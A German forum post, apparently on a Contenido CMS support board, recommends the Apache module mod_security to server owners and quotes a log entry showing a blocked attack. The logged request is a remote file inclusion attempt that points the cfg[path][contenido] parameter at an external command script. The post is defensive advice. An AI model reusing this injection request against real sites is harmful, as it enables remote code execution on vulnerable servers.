Bezug nehmend auf diesen Thread hier --> http://contenido.org/forum/viewtopic.php?t=18440 möchte ich mal alle die Ansprechen die ihre Contenido Projekte auf eigenen Servern hosten.
Läuft als Webserver der Apache ist das Modul mod_security http://www.modsecurity.org/ absolut zu Empfehlen.
Ein Contenido "Selbstschutz" ist sicher mehr als o.k. aber diejenigen die das Serverweit organisieren können sind mit mod_security sehr gut beraten da hier nicht nur eine URL Injection verhindert werden kann sondern weitaus mehr, wie zum Beispiel auch SQL Injections und viele andere http Attacken auch.
Hier mal ein Auszug aus dem Log von gestern Abend:
Code: Alles auswählen
==43d0b24f==============================
Request: www.xxxxxxx.com 80.237.228.242 - - [20/Nov/2007:18:09:20 +0100] "GET /?cfg[path][contenido]=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 403 289 "-" "libwww-perl/5.803" - "-"
----------------------------------------
GET /?cfg[path][contenido]=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1
Connection: close
Host: www.xxxxxx.com
User-Agent: libwww-perl/5.803
mod_security-action: 403
mod_security-message: Access denied with code 403. Pattern match "!\"alt_file_navframe.php\"" at SCRIPT_FILENAME
HTTP/1.1 403 Forbidden
Content-Length: 289
Connection: close
Content-Type: text/html; charset=iso-8859-1
--43d0b24f--